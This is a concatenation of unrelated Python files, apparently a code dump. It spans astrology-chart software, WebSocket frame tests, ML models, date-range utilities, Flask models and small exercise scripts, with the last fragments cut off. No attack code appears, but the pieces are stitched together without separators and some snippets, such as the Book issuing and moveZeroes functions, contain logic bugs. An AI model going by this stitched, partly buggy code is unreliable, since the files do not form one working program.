MainPanel from zodiac import Zodiac from drawing.roundedcharts import * from drawing.aspects import SimpleAspectManager import database import config import chart from gui.mainnb import Slot boss = None import pickle from directions import solar_rev, sec_prog suffixes = { 'draw_nat':'rx','draw_nod':'nd','draw_house':'hs','draw_local':'lc', 'draw_soul':'ca','draw_prof':'pf','draw_int':'in','draw_single':'sn','draw_radsoul':'rsi','draw_dharma':'dh', 'draw_planetogram':'pg', 'click_hh':'hh','click_nn':'nn','click_hn':'hn','click_nh':'nh','click_ss':'ss', 'click_sn':'sn','click_rs':'rsc','sec_prog':'sp','solar_rev':'sr', 'click_rr':'rc','draw_transits':'tr','dat_nat':'dr','dat_house':'dh', 'dat_node:':'dn','prog_nat':'pr','prog_nod':'pn','prog_local':'pl','prog_soul':'ps', 'bio_nat':'br','bio_nod':'bn','bio_soul':'bs','dyn_cuad':'d1','dyn_stars':'ds', 'subject_click':'cs', 'dyn_cuad2':'d2', 'click_bridge':'br', 'compo_one':'c1','compo_two':'c2','ascent_star':'as','polar_star':'ps', 'wundersensi_star':'ws','crown_comp':'cr','paarwabe_plot':'pw', 'click_counterpanel': 'ch', 'comp_pe': 'pe', 'draw_ur_nodal': 'un' } class Manager(object): "manage component interactions" def __init__(self,app,opts,state): global boss self.home_dir = app.home_dir self.config_file = app.config_file self.app = app self.version = app.version self.opts = opts self.opts.zodiac = Zodiac(self.opts.transtyle) self.state = state self.ipshell = None self.datab = database boss = self chart.boss = self self.slotter = Slot SimpleAspectManager.orbs = state.orbs SimpleAspectManager.peorbs = state.peorbs SimpleAspectManager.trorbs = state.transits self.suffixes = suffixes f = open('astronex/resources/ac.pk') self.acpaths = pickle.load(f) f.close() def set_mainwin(self,mainwin): self.mainwin = mainwin self.da = self.mainwin.da self.mainwin.mpanel.browser.chartview.mainwin = mainwin # @!#? self.mpanel = mainwin.mpanel self.state.act_pool = MainPanel.actualize_pool mainwin.mpanel.init_pools() view = self.mpanel.chooser.notebook.get_nth_page(0) view.set_cursor(0,) view.grab_focus() self.da.drawer.hoff = self.da.allocation.width * 0.125 self.da.drawer.gridw = self.da.drawer.hoff * 6 self.da.drawer.set_AP_DEG() # winmain services def get_homer_dir(self): return app.home_dir def set_fullscreen_state(self,flag): self.da.__class__.fullscreen = flag ################################# def parse_colors(self): return config.parse_colors() def parse_aux_colors(self): return config.parse_aux_colors() def get_colors(self): return config.cfgcols def reset_colors(self): config.reset_colors(self.opts) def redraw(self,both=True): if both: self.da.redraw() if self.mainwin.plagram: self.mainwin.plagram.sda.redraw() def get_state(self): return self.state def get_database(self): return self.datab def get_version(self): return self.version ##### def get_showEA(self): return self.da.drawer.get_showEA() ##### pdf def set_pdf(self,paper,labels=False): from surfaces import pdfsurface as surf surf.PDFW, surf.PDFH = surf.papers[paper] surf.pdflabels = labels def set_pdf_custom(self,w,h): from surfaces import pdfsurface as surf surf.papers['custom'] = (w,h) ##### scripts loading def load_script(self,script): sc = ".".join(['astronex.scripts',script]) mod = __import__(sc) components = sc.split('.') for comp in components[1:]: mod = getattr(mod, comp) mod = getattr(mod,script) return mod(self) ##### chart - Chart interface def giveme_single_chartob(self,kind='radix'): singles = {'radix':RadixChart,'house':HouseChart,'nodal':NodalChart, 'soul':SoulChart} st = self.get_state() return singles[kind](st.curr_chart,st.curr_click) def get_simple_amanager(self): return SimpleAspectManager() def swap_to_ten(self): self.da.drawer.aspmanager.swap_to_ten() self.da.redraw() def swap_to_twelve(self): self.da.drawer.aspmanager.swap_to_twelve() self.da.redraw() ##### shell util def prepare_shell(self,kind='radix'): ch = self.giveme_single_chartob(kind) am = self.get_simple_amanager() return ch,am def calc_house_ap(self,h): c = self.get_state().curr_chart co = boss.giveme_single_chartob() p = co.sortplan() return c.calc_house_agep(p,h) def list_click_aspects(self,kind='hh'): clicks = { 'hh': HouseHouseChart, 'hn': HouseHouseChart, 'nn': NodalNodalChart, 'nh': NodalNodalChart, 'ss': SoulSoulChart, 'rr': RadixRadixChart } st = self.get_state() chobj = clicks[kind](st.curr_chart,st.curr_click) am = self.get_simple_amanager() if kind in ['nn','nh']: p1 = chobj.get_planets(True) else: p1 = chobj.get_planets() chobj.swap_charts() if kind == 'nn': p2 = chobj.get_planets(True) elif kind == 'hn': chobj.__class__ = NodalNodalChart p2 = chobj.get_planets(True) elif kind == 'nh': chobj.__class__ = HouseHouseChart p2 = chobj.get_planets() else: p2 = chobj.get_planets() aspects = set(am.twelve_aspects(p1,p2)) gw = set(a for a in aspects if a.f1 > 1 and a.f2 > 1) aspects.difference_update(gw) conj = set(a for a in aspects if a.a == 0) aspects.difference_update(conj) noopos = set(a for a in aspects if a.a != 6) aspects.difference_update(noopos) print 'conj' for a in conj: print a.p1, a.p2 print 'opos' for a in aspects: print a.p1, a.p2 def load_one_fav(self): if not self.state.fav: return ix = self.state.fav_ix active = Slot.storage self.state.load_from_fav(ix,active) MainPanel.actualize_pool(active,self.state.charts[active]) ix = (ix + 1) % len(self.state.fav) self.state.fav_ix = ix def solar_rev(self): solar_rev(self) def sec_prog(self): sec_prog(self) def load_couple(self): if not self.state.couples: return ix = self.state.coup_ix chart = self.state.charts['master'] table = self.state.couples[ix]['fem'][1] id = self.state.couples[ix]['fem'][2] self.state.datab.load_chart(table,id,chart) self.mpanel.actualize_pool('master',chart) chart = self.state.charts['click'] table = self.state.couples[ix]['mas'][1] id = self.state.couples[ix]['mas'][2] self.state.datab.load_chart(table,id,chart) self.mpanel.actualize_pool('click',chart) ix = (ix + 1) % len(self.state.couples) self.state.coup_ix = ix def search_couple(self,female,male): for c in self.state.couples: if ((c['fem'][0] == female and c['mas'][0] == male) or (c['fem'][0] == male and c['mas'][0] == female)): return c['dates'] return None class Book: def __init__(self): self.BookNumber=0 self.BookName='' self.Author='' self.Publisher='' self.Price=0.0 self.noofcopies=0 self.noofcopiesissued=0 def entbook(self): self.BookNumber=input('Enter book number: ') self.BookName=raw_input('Enter book name: ') self.Author=raw_input('Enter Author name: ') self.Publisher=raw_input('Enter Publisher name: ') self.Price=float(input('Enter price of book: ')) self.noofcopies=input('Enter number of copies: ') self.noofcopiesissued=input('Enter number of copies issued: ') def issuebook(self): if self.noofcopies-self.noofcopiesissued>=1: self.noofcopies+=1 def returnbook(self): self.noofcopiesissued-=1 def display(self): print 'Book number',self.BookNumber print 'Book name',self.BookName print 'Author name',self.Author print 'Publisher name',self.Publisher print 'Price of book',self.Price print 'Number of copies',self.noofcopies print 'Number of copies issued',self.noofcopiesissued tests/utils/test_frame.py from random import randint import struct import unittest from pulsar.api import ProtocolError from pulsar.utils.websocket import frame_parser, parse_close def i2b(args): return bytes(bytearray(args)) class FrameTest(unittest.TestCase): @classmethod def setUpClass(cls): cls.bdata = i2b((randint(0, 255) for v in range(256))) cls.large_bdata = i2b((randint(0, 255) for v in range(64*1024))) def parser(self, pyparser=False, **kw): return frame_parser(**kw) def test_version(self): self.assertRaises(ProtocolError, self.parser, version='bla') def test_server(self): server = self.parser() self.assertEqual(server.decode_mask_length, 4) self.assertEqual(server.encode_mask_length, 0) self.assertEqual(server.max_payload, 1 << 63) def test_both_masked(self): server = self.parser(kind=2) self.assertEqual(server.decode_mask_length, 0) self.assertEqual(server.encode_mask_length, 0) server = self.parser(kind=3) self.assertEqual(server.decode_mask_length, 4) self.assertEqual(server.encode_mask_length, 4) def testCloseFrame(self): parser = self.parser(kind=2) close_message = struct.pack('!H', 1000) + b'OK' f = parser.encode(close_message, opcode=0x8) self.assertEqual(close_message, f[2:]) def testControlFrames(self): s = self.parser() c = self.parser(kind=1) # chunk = s.close(1001) frame = c.decode(chunk) self.assertTrue(frame.final) self.assertEqual(frame.opcode, 8) code, reason = parse_close(frame.body) self.assertEqual(code, 1001) # chunk = s.ping('Hello') frame = c.decode(chunk) self.assertTrue(frame.final) self.assertEqual(frame.opcode, 9) self.assertEqual(i2b((0x89, 0x05, 0x48, 0x65, 0x6c, 0x6c, 0x6f)), chunk) self.assertEqual(frame.body, b'Hello') self.assertRaises(ProtocolError, s.ping, self.bdata) # chunk = s.pong('Hello') frame = c.decode(chunk) self.assertTrue(frame.final) self.assertEqual(frame.opcode, 10) self.assertEqual(frame.body, b'Hello') self.assertRaises(ProtocolError, s.pong, self.bdata) def test_conntrol_frames_fragmented(self): c = self.parser(kind=1) for opcode in (8, 9, 10): chunk = c.encode('test', opcode=opcode, final=False) s = self.parser() try: s.decode(chunk) except ProtocolError: pass else: raise Exception('Protocol error not raised') def testUnmaskedDataFrame(self): parser = self.parser(kind=2) data = parser.encode('Hello') f = parser.decode(data) self.assertEqual(f.opcode, 1) self.assertEqual(len(f.body), 5) self.assertFalse(f.masking_key) # self.assertEqual(i2b((0x81, 0x05, 0x48, 0x65, 0x6c, 0x6c, 0x6f)), data) f1 = parser.encode('Hel', final=False) f2 = parser.continuation('lo', final=True) self.assertEqual(i2b((0x01, 0x03, 0x48, 0x65, 0x6c)), f1) self.assertEqual(i2b((0x80, 0x02, 0x6c, 0x6f)), f2) def testBinaryDataFrame(self): s = self.parser() c = self.parser(kind=1) # chunk = s.encode(self.bdata, opcode=2) frame = c.decode(chunk) self.assertEqual(frame.opcode, 2) self.assertFalse(frame.masking_key) self.assertEqual(frame.body, self.bdata) self.assertEqual(struct.pack('!BBH', 0x82, 0x7E, 0x0100), chunk[:4]) # chunk = s.encode(self.large_bdata, opcode=2) frame = c.decode(chunk) self.assertEqual(frame.opcode, 2) self.assertFalse(frame.masking_key) self.assertEqual(frame.body, self.large_bdata) self.assertEqual(struct.pack('!BBQ', 0x82, 0x7F, 0x0000000000010000), chunk[:10]) def testMaskData(self): client = self.parser(kind=1) masking_key = i2b((0x37, 0xfa, 0x21, 0x3d)) chunk = client.encode('Hello', masking_key=masking_key) msg = i2b((0x81, 0x85, 0x37, 0xfa, 0x21, 0x3d, 0x7f, 0x9f, 0x4d, 0x51, 0x58)) self.assertEqual(chunk, msg) def testParserBinary(self): s = self.parser() c = self.parser(kind=1) chunk = c.encode(self.bdata, opcode=2) frame = s.decode(chunk) self.assertTrue(frame) self.assertEqual(frame.body, self.bdata) # # Now try different masking key chunk = c.encode(self.large_bdata, opcode=2, masking_key=b'ciao') frame = s.decode(chunk) self.assertTrue(frame) self.assertEqual(frame.body, self.large_bdata) def testPartialParsing(self): s = self.parser() c = self.parser(kind=1) chunk = s.encode(self.large_bdata, opcode=2) # self.assertEqual(c.decode(chunk[:1]), None) self.assertEqual(c.decode(chunk[1:5]), None) self.assertEqual(c.decode(chunk[5:50]), None) frame = c.decode(chunk[50:]) self.assertTrue(frame) self.assertEqual(frame.body, self.large_bdata) self.assertEqual(frame.opcode, 2) def test_multi_encode(self): s = self.parser() c = self.parser(kind=1) chunks = list(s.multi_encode(self.large_bdata, opcode=2, max_payload=6500)) self.assertEqual(len(chunks), 11) # # Now decode them frames = [] for chunk in chunks: frames.append(c.decode(chunk)) for frame in frames[:-1]: self.assertFalse(frame.final) self.assertTrue(frames[-1].final) msg = b''.join((f.body for f in frames)) self.assertEqual(msg, self.large_bdata) def test_bad_mask(self): s = self.parser() chunk = s.encode('hello') self.assertRaises(ProtocolError, s.decode, chunk) # # and the client c = self.parser(kind=1) chunk = c.encode('hello') self.assertRaises(ProtocolError, c.decode, chunk) def test_symmetric_mask(self): s = self.parser(kind=2) chunk = s.encode('Hello') self.assertEqual(s.decode(chunk).body, 'Hello') s = self.parser(kind=3) chunk = s.encode('Hello') self.assertEqual(s.decode(chunk).body, 'Hello') def test_parse_close(self): self.assertRaises(ProtocolError, parse_close, b'o') # Definition for singly-linked list. class Node(object): def __init__(self, x): self.val = x self.next = None class Solution(object): def mergeKLists(self, lists): # find start node pendings = [] start = None for list in lists: show(list) if list != None and (start == None or list.val < start.val): start = list for n in lists: if n != start and n != None: pendings.append(n) else: if n!=None and n.next != None: pendings.append(n.next) p=start while len(pendings)>0: next = None for n in pendings: if n==None: continue if next==None or next.val > n.val: next = n p.next = next p=p.next next_pendings = [] for n in pendings: if n!=next: next_pendings.append(n) else: if n.next != None: next_pendings.append(n.next) pendings = next_pendings return start def show(n): s = "" while n != None: s += str(n.val) + "->" n = n.next print(s) def test(): ss = Solution() n11 = Node(1) n12 = Node(2) n11.next = n12 n21 = Node(1) n22 = Node(3) n21.next = n22 r=ss.mergeKLists([n11,n21,None]) show(r) test() mesarcik/simclr0 import numpy as np import os import torch import torch.backends.cudnn as cudnn from tqdm import tqdm from sklearn.svm import SVC from sklearn.manifold import TSNE from matplotlib import pyplot as plt from sklearn.metrics import classification_report, confusion_matrix from data import get_data from model import Resnet from utils import _colors, _cifar10_labels, load_checkpoint _batch_size =1024 _gpu=0 def vis_embeddings(model_dir, z_test, z_test_labels, limit=2000): z_embedded = TSNE(n_components=2, learning_rate='auto',init='random').fit_transform(z_test) for i in range(limit): plt.scatter(z_embedded[i,0], z_embedded[i,1], color = _colors[int(z_test_labels[i])], label = _cifar10_labels[int(z_test_labels[i])]); handles, labels = plt.gca().get_legend_handles_labels() by_label = dict(zip(labels, handles)) plt.legend(by_label.values(), by_label.keys()) plt.savefig(os.path.join(model_dir,'embeding'), dpi=300) def linear_classifcation(model_dir,limit=20000): if torch.cuda.is_available(): _device = torch.device('cuda') cudnn.deterministic = True cudnn.benchmark = True # load model model = load_checkpoint(Resnet()) # remove last layer model =torch.nn.Sequential(*list(list(model.children())[0].children())[:-1]) # get z vector with training class trainloader, testloader = get_data('CIFAR10', augment=False, batch_size=_batch_size, size=32, s=1.0) model.cuda() with torch.cuda.device(_gpu): for i,(image_batch, labels_batch) in enumerate(trainloader): if i ==0: z_train = model(image_batch.to(_device)) z_train_labels = labels_batch else: z_train = torch.cat((z_train, model(image_batch.to(_device))), axis=0) z_train_labels = torch.cat((z_train_labels, labels_batch ), axis=0) for i,(image_batch, labels_batch) in enumerate(testloader): if i ==0: z_test = model(image_batch.to(_device)) z_test_labels = labels_batch else: z_test = torch.cat((z_test, model(image_batch.to(_device))), axis=0) z_test_labels = torch.cat((z_test_labels, labels_batch ), axis=0) z_train = z_train.cpu().detach().numpy()[:limit,...,0,0] z_train_labels = z_train_labels.cpu().detach().numpy()[:limit] z_test = z_test.cpu().detach().numpy()[:limit,...,0,0] z_test_labels = z_test_labels.cpu().detach().numpy()[:limit] svclassifier = SVC(kernel='linear') svclassifier.fit(z_train, z_train_labels) y = svclassifier.predict(z_test) print(confusion_matrix(z_test_labels,y)) print(classification_report(z_test_labels,y)) vis_embeddings(model_dir,z_test, z_test_labels) mtortora/chiralDFTresources/processing/xyz_converter.py #!/usr/bin/env python import sys import os.path # Input/output if len(sys.argv) in [2,3]: path_in = os.path.realpath(sys.argv[1]) if len(sys.argv) == 3: path_out = sys.argv[2] else: path_out = os.path.dirname(path_in) + "/trajectory.in" else: print("\033[1;31mUsage is %s trajectory [output]\033[0m" % sys.argv[0]) sys.exit() file_in = open(path_in, mode="r") file_out = open(path_out, mode="w") # Parse trajectory c_count = 0 s_line = file_in.readline() while s_line: file_in.readline() c_count += 1 n_s = int(s_line.split()[0]) for idx_s in range(n_s): xs = [float(x) for x in file_in.readline().split()[1:]] file_out.write(" ".join(str(x) for x in xs)) file_out.write("\n") file_out.write("\n\n") s_line = file_in.readline() file_out.close() print("\033[1;32mPrinted %d configurations to '%s'\033[0m" % (c_count, path_out)) 0 class Solution: def moveZeroes(nums): j=1 for i in range(len(nums)-1): if nums[i] == 0: while j < len(nums): if nums[j] == 0: j+=1 else: #swap nums[i], nums[j] = nums[j], 0 break return nums print(Solution.moveZeroes([0,1,2,3]))adrielkuek/IRS-PM-2021-01-16-ISY5001PT-SureBoT import math import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.nn import BatchNorm1d, Linear, ReLU evidence_num = [] # Select CUDA is GPU is availble, else use CPU # device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') class SelfAttentionLayer(nn.Module): def __init__(self, nhid, nins, device, loggerHandle): super(SelfAttentionLayer, self).__init__() self.nhid = nhid self.nins = nins self.project = nn.Sequential( Linear(nhid, 64), ReLU(True), Linear(64, 1) ) self.device = device self.logger = loggerHandle def forward(self, inputs, index, claims): tmp = None if index > -1: # idx = torch.LongTensor([index]).cuda() idx = torch.LongTensor([index]).to(self.device) own = torch.index_select(inputs, 1, idx) own = own.repeat(1, self.nins, 1) tmp = torch.cat((own, inputs), 2) else: claims = claims.unsqueeze(1) claims = claims.repeat(1, self.nins, 1) tmp = torch.cat((claims, inputs), 2) # before attention = self.project(tmp) weights = F.softmax(attention.squeeze(-1), dim=1) print(weights) self.logger.info(weights) evidence_num.append(weights.detach().cpu().numpy()) outputs = (inputs * weights.unsqueeze(-1)).sum(dim=1) return outputs class AttentionLayer(nn.Module): def __init__(self, nins, nhid, device, loggerHandle): super(AttentionLayer, self).__init__() self.nins = nins self.attentions = [SelfAttentionLayer(nhid=nhid * 2, nins=nins, device=device, loggerHandle=loggerHandle) for _ in range(nins)] for i, attention in enumerate(self.attentions): self.add_module('attention_{}'.format(i), attention) def forward(self, inputs): # outputs = torch.cat([att(inputs) for att in self.attentions], dim=1) outputs = torch.cat([self.attentions[i](inputs, i, None) for i in range(self.nins)], dim=1) outputs = outputs.view(inputs.shape) return outputs class GEAR(nn.Module): def __init__(self, nfeat, nins, nclass, nlayer, pool, device, loggerhandle): super(GEAR, self).__init__() self.nlayer = nlayer self.attentions = [AttentionLayer(nins, nfeat, device, loggerhandle) for _ in range(nlayer)] self.batch_norms = [BatchNorm1d(nins) for _ in range(nlayer)] for i, attention in enumerate(self.attentions): self.add_module('attention_{}'.format(i), attention) self.pool = pool if pool == 'att': self.aggregate = SelfAttentionLayer(nfeat * 2, nins, device, loggerhandle) # self.index = torch.LongTensor([0]).cuda() self.index = torch.LongTensor([0]).to(device) self.weight = nn.Parameter(torch.FloatTensor(nfeat, nclass)) self.bias = nn.Parameter(torch.FloatTensor(nclass)) stdv = 1. / math.sqrt(self.weight.size(1)) self.weight.data.uniform_(-stdv, stdv) self.bias.data.uniform_(-stdv, stdv) def forward(self, inputs, claims): for i in range(self.nlayer): inputs = self.attentions[i](inputs) if self.pool == 'att': inputs = self.aggregate(inputs, -1, claims) if self.pool == 'max': inputs = torch.max(inputs, dim=1)[0] if self.pool == 'mean': inputs = torch.mean(inputs, dim=1) if self.pool == 'top': inputs = torch.index_select(inputs, 1, self.index).squeeze() if self.pool == 'sum': inputs = inputs.sum(dim=1) evi_map = [] for x in range(len(evidence_num)): intermediate_value = evidence_num[x][0] evi_map.append(list(intermediate_value)) inputs = F.relu(torch.mm(inputs, self.weight) + self.bias) evidence_num.clear() return F.log_softmax(inputs, dim=1), evi_map from datetime import datetime from datetime import timedelta from copy import deepcopy import pandas as pd class TimeBubble: def __init__(self, lower: datetime, upper: datetime, delta=timedelta(days=1)): if lower > upper: raise ValueError( 'Upper {} is less then lower {}.'.format(upper, lower)) self.max: datetime = upper self.min: datetime = lower self.mid = self.max.timestamp() + self.min.timestamp() self.leg = self.max.timestamp() - self.min.timestamp() self.delta = delta def __repr__(self): start = self.min end = self.max return 'TimeBubble({}, {})'.format(repr(start), repr(end)) def __str__(self): fmt = '%Y-%m-%d' start = self.min.strftime(fmt) end = self.max.strftime(fmt) return '[{}, {})'.format(start, end) def __contains__(self, value): try: return self.min <= value < self.max except: return self.min <= value.min <= value.max < self.max def __iter__(self): date = self.min while date < self.max: yield date date += self.delta def iter_years(self): min_year: int = self.min.year max_year: int = self.max.year for year in range(min_year, max_year+1): mi = max(self.min, datetime(year, 1, 1)) ma = min(self.max, datetime(year+1, 1, 1)) yield TimeBubble(mi, ma, self.delta) def to_list(self) -> list: return [self.min, self.max] def to_actualrange(self) -> list: return [self.min, self.max-self.delta] def to_mongodb_date_range(self) -> dict: return {'$gte': self.min, '$lt': self.max} def to_mongodb_dates(self, freq) -> dict: date_range = pd.date_range(self.min, self.max-self.delta, freq=freq) return {'$in': [d.to_pydatetime() for d in date_range]} def merge(self, bubble): if self._mergeable(bubble): mi = min(self.min, bubble.min) ma = max(self.max, bubble.max) return TimeBubble(mi, ma), None else: return self, bubble def carve(self, bubble): if self._mergeable(bubble): l = self.min u = bubble.min left = TimeBubble(l, u) if l < u else None l = bubble.max u = self.max right = TimeBubble(l, u) if l < u else None return left, right else: return self, None def intersect(self, bubble): if self._mergeable(bubble): mi = max(self.min, bubble.min) ma = min(self.max, bubble.max) return TimeBubble(mi, ma, self.delta) else: return None def _mergeable(self, bubble): return abs(self.mid - bubble.mid) <= (self.leg + bubble.leg) class Bubbles(): def __init__(self, bubbles=[]): self._bubbles = [] for b in (self._convert(b) for b in bubbles): self._bubbles.append(b) self._triple_kill() def __repr__(self): return 'Bubbles({})'.format(self._bubbles) def __str__(self): return '[{}]'.format(',\n'.join([str(b) for b in self._bubbles])) def __contains__(self, value): for b in self._bubbles: if value in b: return True return False def __len__(self): return len(self._bubbles) def __getitem__(self, key): return self._bubbles[key] def __setitem__(self, key, value): try: self._bubbles[key] = self._convert(value) except: raise ValueError( 'Value {} not compatible with Bubbles.'.format(value)) self._triple_kill() def __delitem__(self, key): del self._bubbles[key] def __iter__(self): return iter(self._bubbles) @property def min(self): return self._bubbles[0].min @property def max(self): return self._bubbles[-1].max @property def isempty(self) -> bool: if len(self._bubbles) == 0: return True else: return False def gaps(self, bubble=None): '''Return gaps between bubbles.''' fullbubble = TimeBubble(self.min, self.max) \ if bubble is None else self._convert(bubble) res = Bubbles() try: for b in self._bubbles: l, r = fullbubble.carve(b) fullbubble = r res._bubbles.append(l) except AttributeError: pass finally: res._bubbles.append(fullbubble) res._triple_kill() return res def to_list(self) -> list: res = [] for b in self._bubbles: res.append(b.to_list()) return res def to_actualrange(self) -> list: res = [] for b in self: res.append(b.to_actualrange()) return res def merge(self, bubble): res = Bubbles() res._bubbles = deepcopy(self._bubbles) res._bubbles.append(res._convert(bubble)) res._triple_kill() return res def carve(self, bubble): b_carve = self._convert(bubble) res_list = [] for b in self._bubbles: b1, b2 = b.carve(b_carve) res_list.append(b1) res_list.append(b2) return Bubbles(res_list) def intersect(self, bubble): bubble = self._convert(bubble) res = [] for s in self: i = s.intersect(bubble) res.append(i) return Bubbles(res) def _triple_kill(self): self._drop_none() self._sort() self._squeeze() def _squeeze(self): p = 0 count = len(self._bubbles) while p < count: for q, b_q in ((q, b_q) for q, b_q in enumerate(self._bubbles) if q > p): self._bubbles[p], self._bubbles[q] = self._bubbles[p].merge( b_q) self._drop_none() p += 1 count = len(self._bubbles) def _sort(self): self._bubbles.sort(key=lambda x: x.mid) def _drop_none(self): self._bubbles = [b for b in self._bubbles if b is not None] def _convert(self, value): if isinstance(value, TimeBubble): return value elif value is None: return None else: return TimeBubble(min(value), max(value)) from app import db from datetime import datetime class CompetitionTable(db.Model): __tablename__ = 'competition_tables' id = db.Column(db.Integer, primary_key=True) number = db.Column(db.Integer) name = db.Column(db.String(20)) slots = db.relationship('MatchSlot', backref='competition_table') def __init__(self, number, name): self.number = number self.name = name class MatchSlot(db.Model): __tablename__ = 'match_slots' id = db.Column(db.Integer, primary_key=True) match_id = db.Column(db.Integer, db.ForeignKey('matches.id')) competition_table_id = db.Column(db.Integer, db.ForeignKey('competition_tables.id')) team_id = db.Column(db.Integer, db.ForeignKey('teams.id')) def __init__(self, table_id, team_id): self.competition_table_id = table_id self.team_id = team_id class Match(db.Model): __tablename__ = 'matches' id = db.Column(db.Integer, primary_key=True) number = db.Column(db.Integer) match_type = db.Column(db.String(1)) round_number = db.Column(db.Integer) time = db.Column(db.DateTime) slots = db.relationship('MatchSlot', backref='match') def __init__(self, number, match_type, round_number, time): self.number = int(number) self.match_type = match_type self.time = datetime.strptime(time, '%I:%M%p') self.round_number = int(round_number) @property def friendly_type(self): return 'Qualification' if self.match_type == 'Q' else 'Playoff' osoco/better-ways-of-thinking-about-softwarePart-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/lib/x_forwarded_for/middleware.py """ Middleware to use the X-Forwarded-For header as the request IP. Updated the libray to use HTTP_HOST and X-Forwarded-Port as SERVER_NAME and SERVER_PORT. """ from django.utils.deprecation import MiddlewareMixin class XForwardedForMiddleware(MiddlewareMixin): """ Gunicorn 19.0 has breaking changes for REMOTE_ADDR, SERVER_* headers that can not override with forwarded and host headers. This middleware can be used to update these headers set by proxy configuration. """ def process_request(self, request): # lint-amnesty, pylint: disable=useless-return """ Process the given request, update the value of REMOTE_ADDR, SERVER_NAME and SERVER_PORT based on X-Forwarded-For, HTTP_HOST and X-Forwarded-Port headers """ for field, header in [("HTTP_X_FORWARDED_FOR", "REMOTE_ADDR"), ("HTTP_HOST", "SERVER_NAME"), ("HTTP_X_FORWARDED_PORT", "SERVER_PORT")]: if field in request.META: if ',' in request.META[field]: request.META[header] = request.META[field].split(",")[0].strip() else: request.META[header] = request.META[field] return None scripts/craps_Baybay.py num1 = int(input("Enter the first value: ")) if ((num1 < 1) or (num1 > 6)): print("Invalid value") exit() num2 = int(input("Enter the second value: ")) if ((num2 < 1) or (num2 > 6)): print("Invalid value") exit() sum = num1 + num2 if(sum == 7 or sum == 11): print("Congratulations! You win!") elif(sum == 2 or sum == 3 or sum == 12): print("Better luck next time.") else: print(f"You have {sum} points.") 1-10 from .base import Base class Atoi(Base): is_loaded = False def __init__(self, compiler): Base.__init__(self, compiler) if Atoi.is_loaded: return self.load('atoi.asm', 'atoi') Atoi.is_loaded = True app/language_features/dictionary/dict_demo.py my_customers = [ ('01', 'XYZ abc', 42.09, ), ('02', 'TR deep', 90.01 ) ] my_other_customers = [ {'ID': '01', 'Name': '', 'Credit': 42.09 }, {'ID': '02', 'Name': '', 'Credit': 90.01 } ] mydict = {'ID': '01', 'Name': '', 'Credit': 42.09 } assert mydict['Credit'] == 42.09 for customer in my_other_customers: print(customer['Name']) for customer in my_other_customers: print(customer.get('Name')) for customer in my_other_customers: customer['Credit'] *= 1.5 for customer in my_other_customers: print(customer.values()) for customer in my_other_customers: for key, value in customer.items(): print(key, value) my_dict = {"Name": "Andy", "Job": "Tutor"} dict_to_list = [] for key, value in my_dict.items(): dict_to_list.append((key, value)) assert dict_to_list == [("Name", "Andy"), ("Job", "Tutor")] people = [ {"Name": "Andy", "Job": "Tutor"}, {"Name": "Fred", "Job": "Analyst"}, {"Name": "Pam", "Job": "Nurse"}, ] assert people[1]["Name"] == "Fred" # dictionary keys must be unique; show what happens when they are not my_dict = { "Name": "Andy", "Job": "Tutor", "Job": "Analyst", "Preferred_name": "Andy", } assert my_dict == {"Name": "Andy", "Job": "Analyst", "Preferred_name": "Andy"} # transpose keys and values my_new_dict = {} for key, value in my_dict.items(): my_new_dict[value] = key assert my_new_dict == {"Analyst": "Job", "Andy": "Preferred_name"} people = [ {"Name": "Andy", "Job": "Tutor"}, {"Name": "Fred", "Job": "Analyst"}, {"Name": "Pam", "Job": "Nurse"}, ] better_people = { 1: {"Name": "Andy", "Job": "Tutor"}, 2: {"Name": "Fred", "Job": "Analyst"}, 3: {"Name": "Pam", "Job": "Nurse"}, } better_people2 = { 'Andy': {"Name": "Andy", "Job": "Tutor"}, 'Fred': {"Name": "Fred", "Job": "Analyst"}, 3: {"Name": "Pam", "Job": "Nurse"}, } assert better_people[2] == {"Name": "Fred", "Job": "Analyst"} assert better_people[2]["Name"] == "Fred" experiments/label_traffic_video.py from __future__ import unicode_literals import os, sys sys.path.insert(0,"/home/autolab/Workspaces/jim_working/env/lib/python2.7/site-packages/") from tcp.object_detection.video_labeler import VideoLabeler from tcp.configs.alberta_config import Config import cPickle as pickle import glob cnfg = Config() vl = VideoLabeler(cnfg) ###GET VIDEOS VIDEO_FILE = '%s/*.mp4' % cnfg.video_root_dir videos = glob.glob(VIDEO_FILE) ###LABEL VIDEOS for video_path in sorted(videos): video_name = os.path.splitext(os.path.basename(video_path))[0] datestamp = video_name.split('_')[-2] timestamp = video_name.split('_')[-1] year, month, date = [int(i) for i in datestamp.split('-')] hour, minute, second = [int(i) for i in timestamp.split('-')] # Setting first video tmp_time = int('%02d%02d%02d' % (date, hour, minute)) if tmp_time < 271201: continue # Setting last video if tmp_time > 271700: break # Process video print '\nRunning video labeler on %s' % (video_name) vl.load_video(video_path) all_rclasses, all_rbboxes = vl.generate_bounding_boxes(debug_pickle=True) all_rclasses, all_rbboxes = vl.run_init_labeler(debug_pickle=True, show_gui=True) camera_view_trajectory = vl.generate_trajectories() with open('{0}/{1}/{1}_trajectories.cpkl'.format(cnfg.save_debug_pickles_path, video_name),'wb+') as trajectory_file: pickle.dump(camera_view_trajectory, trajectory_file) vl.close_video() raw_input('\nPress enter to continue...\n') print 'End of labeling' from flask import request from flask_restful import Resource from db.db_handler import perform_select from query_builder.query_builder_factory import QueryBuilderFactory from response_builder.response_factory import ResponseFactory class SearchPolygon(Resource): def get(self): path = request.args.get('path') date = request.args.get('date') param_id = request.args.get("param_id") mars_class = request.args.get("mars_class") mars_type = request.args.get("mars_type") start_date = request.args.get("start_date") end_date = request.args.get("end_date") limit = request.args.get("limit") page = request.args.get("page") sort = request.args.get("sort") query, value = QueryBuilderFactory.get_type('polygon').build(dict( path=path, date=date, param_id=param_id, mars_class=mars_class, mars_type=mars_type, start_date=start_date, end_date=end_date, limit=limit, page=page, sort=sort )) result = perform_select(query, value) response_type = request.args.get("response_type") response_builder = ResponseFactory.get_type(response_type) response = response_builder.build(result) return response { "targets": [ { "target_name": "nodelua", "variables": { "lua_include": "release/stubs/Autodesk/Revit/DB/Structure/__init__.py # encoding: utf-8 # module Autodesk.Revit.DB.Structure calls itself Structure # from RevitAPI, Version=17.0.0.0, Culture=neutral, PublicKeyToken=null # by generator 1.145 # no doc # no imports # no functions # classes class AnalyticalAlignmentMethod(Enum, IComparable, IFormattable, IConvertible): """ Specifies how analytical model is being aligned in space enum 